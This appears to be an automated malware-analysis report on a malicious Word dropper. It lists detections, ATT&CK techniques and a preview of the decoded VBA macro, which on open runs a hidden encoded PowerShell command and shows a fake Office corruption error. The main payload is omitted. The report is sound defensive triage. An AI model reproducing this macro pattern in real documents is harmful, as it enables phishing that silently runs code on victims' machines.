Verdict: MALICIOUS
Risk Score: 312
Malware Insights

MITRE ATT&CK:
- T1059.001 PowerShell
- T1566.001 Spearphishing Attachment
- T1203 Exploitation for Client Execution
The sample contains VBA macros with an AutoOpen subroutine that executes a PowerShell command. The PowerShell command is heavily obfuscated but appears to download and execute a second-stage payload. The document body uses a common lure to convince users to enable macros.
Heuristics (10)

- ClamAV: Doc.Dropper.MagicHound-5859115-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.MagicHound-5859115-0
- VBA macros detected (medium, OLE_VBA_MACROS, 4 related findings): Document contains VBA macro code
- Potential Shell call in VBA (critical, OLE_VBA_SHELL): Potential Shell call in VBA. Matched line in script:
  & "IAFMAIAAkAGUAIgB9AGUAbABzAGUAewA7AGkAZQB4ACAAIgAmACAAcABvAHcAZQByAHMAaABlAGwAbAAgACQAQwBIAFMAIAAkAGUAIgA7AH0A" Shell ("powershell.exe " & x) Dim title As String
- PowerShell reference in VBA (critical, OLE_VBA_PS): PowerShell reference in VBA. Matched line in script:
  & "IAFMAIAAkAGUAIgB9AGUAbABzAGUAewA7AGkAZQB4ACAAIgAmACAAcABvAHcAZQByAHMAaABlAGwAbAAgACQAQwBIAFMAIAAkAGUAIgA7AH0A" Shell ("powershell.exe " & x) Dim title As String
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- AutoOpen macro (low, OLE_VBA_AUTOOPEN): AutoOpen macro. Matched line in script:
  Attribute VB_Customizable = True Sub AutoOpen() Dim x
- Reference to PowerShell (high, SC_STR_POWERSHELL): Reference to PowerShell
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7739 bytes |

SHA-256: 91c68affec5595a95b7a5b4a448a5e7fa75e69982ad695d609ba536010bc42f5

Detection:
- ClamAV: No threats found
- Obfuscation or payload: likely (carved artifact contains 18 long base64-like blob(s))

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
Dim x
x = "-window hidden -e ..." ' base64-encoded PowerShell payload (19 continuation lines) omitted from this preview
Shell ("powershell.exe " & x)
Dim title As String
title = "Critical Microsoft Office Error"
Dim msg As String
Dim intResponse As Integer
msg = "This document appears to be corrupt or missing critical rows in order to restore. Please restore this file from a backup."
intResponse = MsgBox(msg, 16, title)
Application.Quit
End Sub